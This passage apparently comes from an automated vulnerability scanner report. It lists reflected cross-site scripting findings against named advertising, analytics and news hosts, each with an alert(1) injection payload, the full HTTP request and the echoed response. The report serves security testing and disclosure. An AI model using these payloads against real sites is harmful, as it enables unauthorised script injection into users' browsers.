ry{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"6864322", c3:"a046a<script>alert(1)</script>d230dd3e0c7", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



2.22. http://b.scorecardresearch.com/beacon.js [c4 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 72c58<script>alert(1)</script>5135e87dd6a was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6864322&c3=&c4=72c58<script>alert(1)</script>5135e87dd6a&c5=&c6=&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://web.adblade.com/imps.php?app=3695&ad_width=300&ad_height=250&title_font=1&title_color=000000&description_font=1&description_color=0066cc&id=83&output=html&tpUrl=http://r1-ads.ace.advertising.com/click/site=0000801647/mnum=0000905406/cstr=35058392=_4e677c35,2342476011,801647^905406^1184^0,1_/xsxdata=$xsxdata/bnum=35058392/optn=64?trg=http%3a%2f%2fwww.adblade.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Wed, 21 Sep 2011 14:14:20 GMT
Date: Wed, 07 Sep 2011 14:14:20 GMT
Content-Length: 1234
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"6864322", c3:"", c4:"72c58<script>alert(1)</script>5135e87dd6a", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



2.23. http://b.scorecardresearch.com/beacon.js [c5 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 495f7<script>alert(1)</script>80f8dd7325a was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6864322&c3=&c4=&c5=495f7<script>alert(1)</script>80f8dd7325a&c6=&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://web.adblade.com/imps.php?app=3695&ad_width=300&ad_height=250&title_font=1&title_color=000000&description_font=1&description_color=0066cc&id=83&output=html&tpUrl=http://r1-ads.ace.advertising.com/click/site=0000801647/mnum=0000905406/cstr=35058392=_4e677c35,2342476011,801647^905406^1184^0,1_/xsxdata=$xsxdata/bnum=35058392/optn=64?trg=http%3a%2f%2fwww.adblade.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Wed, 21 Sep 2011 14:14:20 GMT
Date: Wed, 07 Sep 2011 14:14:20 GMT
Content-Length: 1234
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"6864322", c3:"", c4:"", c5:"495f7<script>alert(1)</script>80f8dd7325a", c6:"", c10:"", c15:"", c16:"", r:""});



2.24. http://b.scorecardresearch.com/beacon.js [c6 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 9bb3e<script>alert(1)</script>b822407984 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6864322&c3=&c4=&c5=&c6=9bb3e<script>alert(1)</script>b822407984&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://web.adblade.com/imps.php?app=3695&ad_width=300&ad_height=250&title_font=1&title_color=000000&description_font=1&description_color=0066cc&id=83&output=html&tpUrl=http://r1-ads.ace.advertising.com/click/site=0000801647/mnum=0000905406/cstr=35058392=_4e677c35,2342476011,801647^905406^1184^0,1_/xsxdata=$xsxdata/bnum=35058392/optn=64?trg=http%3a%2f%2fwww.adblade.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Wed, 21 Sep 2011 14:14:20 GMT
Date: Wed, 07 Sep 2011 14:14:20 GMT
Content-Length: 1233
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"6864322", c3:"", c4:"", c5:"", c6:"9bb3e<script>alert(1)</script>b822407984", c10:"", c15:"", c16:"", r:""});



2.25. http://data.weatherzone.com.au/json/animator/ [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://data.weatherzone.com.au
Path:   /json/animator/

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 589e8<script>alert(1)</script>d9ebc61394f was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /json/animator/?lt=radarz&lc=070&type=radar&df=HH%3Amm%20z&frames=4&callback=cbrad070589e8<script>alert(1)</script>d9ebc61394f HTTP/1.1
Host: data.weatherzone.com.au
Proxy-Connection: keep-alive
Referer: http://weather.news.com.au/wa/perth/perth
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_jk/1.2.31
Content-Length: 1138
Content-Type: text/javascript
Cache-Control: max-age=10
Expires: Wed, 07 Sep 2011 14:17:22 GMT
Date: Wed, 07 Sep 2011 14:17:12 GMT
Connection: close
Vary: Accept-Encoding


cbrad070589e8<script>alert(1)</script>d9ebc61394f({
"frames": [
{ "image": "http://data.weatherzone.com.au/httpdata_r/images/radar/anims/rad_15lev_070_zoom_640x480/rad_15lev_070_zoom_640x480.201109071330.png", "timestamp": 1315402200000, "times
...[SNIP]...

2.26. http://feed.video.news.com.au/f/g5OqK/8MZ0EQEjgP7F/2120022090 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://feed.video.news.com.au
Path:   /f/g5OqK/8MZ0EQEjgP7F/2120022090

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ba7da<script>alert(1)</script>f54888f1a38 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fba7da<script>alert(1)</script>f54888f1a38/g5OqK/8MZ0EQEjgP7F/2120022090?callback=_jqjsp HTTP/1.1
Host: feed.video.news.com.au
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=iso-8859-1
Content-Length: 1437
Server: Jetty(6.1.19)
Expires: Wed, 07 Sep 2011 14:14:59 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 07 Sep 2011 14:14:59 GMT
Connection: close
Vary: Accept-Encoding

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"/>
<title>Error 404 NOT_FOUND</title>
</head>
<body><h2>HTTP ERROR 404</h2>
<p>Problem accessing /fba7da<script>alert(1)</script>f54888f1a38/g5OqK/8MZ0EQEjgP7F/2120022090. Reason:
<pre>
...[SNIP]...

2.27. http://feed.video.news.com.au/f/g5OqK/8MZ0EQEjgP7F/2120022090 [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://feed.video.news.com.au
Path:   /f/g5OqK/8MZ0EQEjgP7F/2120022090

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload f0947<script>alert(1)</script>37466815b88 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /f/g5OqK/8MZ0EQEjgP7F/2120022090?callback=_jqjspf0947<script>alert(1)</script>37466815b88 HTTP/1.1
Host: feed.video.news.com.au
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Last-Modified: Wed, 07 Sep 2011 11:23:25 GMT
Access-Control-Allow-Origin: *
Server: Jetty(6.1.19)
Expires: Wed, 07 Sep 2011 14:19:58 GMT
Date: Wed, 07 Sep 2011 14:14:58 GMT
Content-Length: 5229
Connection: close
Vary: Accept-Encoding

_jqjspf0947<script>alert(1)</script>37466815b88({"$xmlns":{"pl1":"http://mps.theplatform.com/data/Account/178843232","dcterms":"http://purl.org/dc/terms/","media":"http://search.yahoo.com/mrss/","pl":"http://xml.theplatform.com/data/object","pla":"
...[SNIP]...

2.28. http://feed.video.news.com.au/f/g5OqK/8MZ0EQEjgP7F/2120022090 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://feed.video.news.com.au
Path:   /f/g5OqK/8MZ0EQEjgP7F/2120022090

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload ee248<script>alert(1)</script>d08ab2cad06 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /f/g5OqK/8MZ0EQEjgP7F/2120022090?callback=_jqjsp&ee248<script>alert(1)</script>d08ab2cad06=1 HTTP/1.1
Host: feed.video.news.com.au
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Last-Modified: Wed, 07 Sep 2011 14:14:59 GMT
Access-Control-Allow-Origin: *
Server: Jetty(6.1.19)
Expires: Wed, 07 Sep 2011 14:14:59 GMT
Date: Wed, 07 Sep 2011 14:14:59 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 5612

_jqjsp({"title":"BadParameterException","description":"'ee248<script>alert(1)</script>d08ab2cad06' is not a valid parameter.","isException":true,"responseCode":400,"serverStackTrace":"com.theplatform.module.exception.BadParameterException: 'ee248<script>
...[SNIP]...

2.29. http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js [mpck parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7187a"-alert(1)-"d3654a700b0 was submitted in the mpck parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js?mpck=cdn4.eyewonder.com%2Fcm%2Fck%2F12963-135748-32613-46%3Fmpt%3D0028f825-a3f7-465e-ab75-1ee50b08b48b7187a"-alert(1)-"d3654a700b0&mpt=0028f825-a3f7-465e-ab75-1ee50b08b48b&mpvc=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwVjDEOgDAMA7.CMlMpTZo28JtWaifExoT4O87kO8n2S6p0bodL1X0jFYirZg_LEGIWXy6Wuq6WSrWZ.miW8pzGg30UHxTTKDcTbmHxcyANWVgdWID3c13ACsyoWv1.z5cbBw--%26redirectURL%3D HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.html?cb=0.4898127138148993&keyword=wa/news_home&rf=http%3A//www.watoday.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:14:48 GMT
Server: Apache
Last-Modified: Tue, 06 Sep 2011 17:23:47 GMT
ETag: "6295e4-fba-4ac491719cec0"
Accept-Ranges: bytes
Content-Length: 5380
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
<mpcke/>';
if (mpcke == 1) {
mpcclick = encodeURIComponent("cdn4.eyewonder.com%2Fcm%2Fck%2F12963-135748-32613-46%3Fmpt%3D0028f825-a3f7-465e-ab75-1ee50b08b48b7187a"-alert(1)-"d3654a700b0");
mpck = "http://" + mpcclick;
}
else if (mpcke == 2) {
mpcclick2 = encodeURIComponent("cdn4.eyewonder.com%2Fcm%2Fck%2F12963-135748-32613-46%3Fmpt%3D0028f825-a3f7-465e-ab75-1ee50b08b48b7187a"-alert(1
...[SNIP]...

2.30. http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js [mpck parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 69f70'%3balert(1)//42938f6d53f was submitted in the mpck parameter. This input was echoed as 69f70';alert(1)//42938f6d53f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js?mpck=cdn4.eyewonder.com%2Fcm%2Fck%2F12963-135748-32613-46%3Fmpt%3D0028f825-a3f7-465e-ab75-1ee50b08b48b69f70'%3balert(1)//42938f6d53f&mpt=0028f825-a3f7-465e-ab75-1ee50b08b48b&mpvc=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwVjDEOgDAMA7.CMlMpTZo28JtWaifExoT4O87kO8n2S6p0bodL1X0jFYirZg_LEGIWXy6Wuq6WSrWZ.miW8pzGg30UHxTTKDcTbmHxcyANWVgdWID3c13ACsyoWv1.z5cbBw--%26redirectURL%3D HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.html?cb=0.4898127138148993&keyword=wa/news_home&rf=http%3A//www.watoday.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:14:50 GMT
Server: Apache
Last-Modified: Tue, 06 Sep 2011 17:23:47 GMT
ETag: "6295e4-fba-4ac491719cec0"
Accept-Ranges: bytes
Content-Length: 5386
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
n2S6p0bodL1X0jFYirZg_LEGIWXy6Wuq6WSrWZ.miW8pzGg30UHxTTKDcTbmHxcyANWVgdWID3c13ACsyoWv1.z5cbBw--&redirectURL=http://cdn4.eyewonder.com/cm/ck/12963-135748-32613-46?mpt=0028f825-a3f7-465e-ab75-1ee50b08b48b69f70';alert(1)//42938f6d53f" target="_blank">
...[SNIP]...

2.31. http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c937c'%3balert(1)//5a180c5ccee was submitted in the mpvc parameter. This input was echoed as c937c';alert(1)//5a180c5ccee in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js?mpck=cdn4.eyewonder.com%2Fcm%2Fck%2F12963-135748-32613-46%3Fmpt%3D0028f825-a3f7-465e-ab75-1ee50b08b48b&mpt=0028f825-a3f7-465e-ab75-1ee50b08b48b&mpvc=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwVjDEOgDAMA7.CMlMpTZo28JtWaifExoT4O87kO8n2S6p0bodL1X0jFYirZg_LEGIWXy6Wuq6WSrWZ.miW8pzGg30UHxTTKDcTbmHxcyANWVgdWID3c13ACsyoWv1.z5cbBw--%26redirectURL%3Dc937c'%3balert(1)//5a180c5ccee HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.html?cb=0.4898127138148993&keyword=wa/news_home&rf=http%3A//www.watoday.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:15:03 GMT
Server: Apache
Last-Modified: Tue, 06 Sep 2011 17:23:47 GMT
ETag: "6295e4-fba-4ac491719cec0"
Accept-Ranges: bytes
Content-Length: 5382
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
dia.com/pixel?returnType=redirect&key=Click&message=eJwVjDEOgDAMA7.CMlMpTZo28JtWaifExoT4O87kO8n2S6p0bodL1X0jFYirZg_LEGIWXy6Wuq6WSrWZ.miW8pzGg30UHxTTKDcTbmHxcyANWVgdWID3c13ACsyoWv1.z5cbBw--&redirectURL=c937c';alert(1)//5a180c5cceehttp://cdn4.eyewonder.com/cm/ck/12963-135748-32613-46?mpt=0028f825-a3f7-465e-ab75-1ee50b08b48b" target="_blank">
...[SNIP]...

2.32. http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4fa38"%3balert(1)//58a2ce83bc6 was submitted in the mpvc parameter. This input was echoed as 4fa38";alert(1)//58a2ce83bc6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js?mpck=cdn4.eyewonder.com%2Fcm%2Fck%2F12963-135748-32613-46%3Fmpt%3D0028f825-a3f7-465e-ab75-1ee50b08b48b&mpt=0028f825-a3f7-465e-ab75-1ee50b08b48b&mpvc=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwVjDEOgDAMA7.CMlMpTZo28JtWaifExoT4O87kO8n2S6p0bodL1X0jFYirZg_LEGIWXy6Wuq6WSrWZ.miW8pzGg30UHxTTKDcTbmHxcyANWVgdWID3c13ACsyoWv1.z5cbBw--%26redirectURL%3D4fa38"%3balert(1)//58a2ce83bc6 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.html?cb=0.4898127138148993&keyword=wa/news_home&rf=http%3A//www.watoday.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:15:00 GMT
Server: Apache
Last-Modified: Tue, 06 Sep 2011 17:23:47 GMT
ETag: "6295e4-fba-4ac491719cec0"
Accept-Ranges: bytes
Content-Length: 5382
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
dia.com/pixel?returnType=redirect&key=Click&message=eJwVjDEOgDAMA7.CMlMpTZo28JtWaifExoT4O87kO8n2S6p0bodL1X0jFYirZg_LEGIWXy6Wuq6WSrWZ.miW8pzGg30UHxTTKDcTbmHxcyANWVgdWID3c13ACsyoWv1.z5cbBw--&redirectURL=4fa38";alert(1)//58a2ce83bc6");
mpvc = mpvclick;
}
else if (mpvce == 2) {
mpvclick2 = encodeURIComponent("http://g.ca.bid.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwVjDEOgDAMA7.CMlMpTZo28JtWaifExoT4O87kO8n2S6p
...[SNIP]...

2.33. http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js [mpck parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9fecd"-alert(1)-"ad31c053526 was submitted in the mpck parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js?mpck=cdn4.eyewonder.com%2Fcm%2Fck%2F12963-135748-32613-45%3Fmpt%3De2ad7d29-284a-468a-a5d2-3ed41b4188f89fecd"-alert(1)-"ad31c053526&mpt=e2ad7d29-284a-468a-a5d2-3ed41b4188f8&mpvc=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwVjDsOhTAQA6.CtiYS.0nicJugQIXoqNC7.3Mqz0i2P3GXfWmw4usibhS4K4KmFDmtjzqsJUP0FAU99Tws.TlCj1DggszpLNdsW502fxozM2NzEIP4vPdNLERlNevvD.pwGzw-%26redirectURL%3D HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/7856/12590/22782-2.html?cb=0.5008782960940152&keyword=smh/news_other
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:16:40 GMT
Server: Apache
Last-Modified: Tue, 06 Sep 2011 17:24:45 GMT
ETag: "82e9a3-fb0-4ac491a8ed140"
Accept-Ranges: bytes
Content-Length: 5370
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
<mpcke/>';
if (mpcke == 1) {
mpcclick = encodeURIComponent("cdn4.eyewonder.com%2Fcm%2Fck%2F12963-135748-32613-45%3Fmpt%3De2ad7d29-284a-468a-a5d2-3ed41b4188f89fecd"-alert(1)-"ad31c053526");
mpck = "http://" + mpcclick;
}
else if (mpcke == 2) {
mpcclick2 = encodeURIComponent("cdn4.eyewonder.com%2Fcm%2Fck%2F12963-135748-32613-45%3Fmpt%3De2ad7d29-284a-468a-a5d2-3ed41b4188f89fecd"-alert(1
...[SNIP]...

2.34. http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js [mpck parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 35585'%3balert(1)//18083999448 was submitted in the mpck parameter. This input was echoed as 35585';alert(1)//18083999448 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

